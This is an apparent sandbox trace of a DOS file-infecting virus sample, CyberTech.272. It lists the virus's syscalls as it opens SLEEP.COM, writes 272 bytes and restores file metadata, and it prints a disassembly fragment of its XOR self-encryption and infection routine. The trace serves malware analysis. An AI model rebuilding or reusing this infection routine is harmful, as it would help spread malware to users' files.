Sample viewer

vx.netlux.org/Virus.DOS.CyberTech.272

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:50:33.018863066Z 26 PC: 21e72 | Set disk transfer address
2018-12-17T22:50:33.020947016Z 78 PC: 21e7c | Find first file
2018-12-17T22:50:33.027558479Z 67 PC: 21e89 | Get or set file attributes
2018-12-17T22:50:33.033765632Z 67 PC: 21e91 | Get or set file attributes
2018-12-17T22:50:33.051988137Z 61 PC: 21e96 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:50:33.059401047Z 87 PC: 21e9c | Get or set file date and time
2018-12-17T22:50:33.060892211Z 63 PC: 21ea9 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:50:33.06856183Z 66 PC: 21ecf | Move file pointer
2018-12-17T22:50:33.070039599Z 44 PC: 21ee2 | Get time
0x21ee2: mov byte ptr cs:[bp + 0x17], dl
0x21ee7: lea si, word ptr [bp + 3]
0x21eeb: mov di, 0xfd00
0x21eee: mov cx, 0x18
0x21ef1: rep movsb byte ptr es:[di], byte ptr [si]
0x21ef3: lea si, word ptr [bp + 0x1b]
0x21ef7: mov cx, 0xf8
0x21efa: lodsb al, byte ptr [si]
0x21efb: xor al, dl
0x21efd: stosb byte ptr es:[di], al
0x21efe: loop 0x21efa
0x21f00: mov ah, 0x40
0x21f02: mov dx, 0xfd00
0x21f05: mov cx, 0x110
0x21f08: int 0x21
0x21f0a: mov ax, 0x4200
0x21f0d: call 0x31ec9
0x21f10: mov ah, 0x40
0x21f12: lea dx, word ptr [bp + 0x106]
0x21f16: mov cx, 4
2018-12-17T22:50:33.072384656Z 64 PC: 21f0a | Write file or device (Write 272 bytes on handle 5)
2018-12-17T22:50:33.082033752Z 66 PC: 21ecf | Move file pointer
2018-12-17T22:50:33.087518695Z 64 PC: 21f1b | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:50:33.094736776Z 87 PC: 21f34 | Get or set file date and time
2018-12-17T22:50:33.096847083Z 62 PC: 21f38 | Close file
2018-12-17T22:50:33.105480573Z 67 PC: 21f41 | Get or set file attributes
2018-12-17T22:50:33.116387861Z 26 PC: 21f25 | Set disk transfer address
2018-12-17T22:50:33.11813818Z 9 PC: 12a85 | Display string (String= 'S ')
2018-12-17T22:50:33.124316894Z 0 PC: 12a89 | Program terminate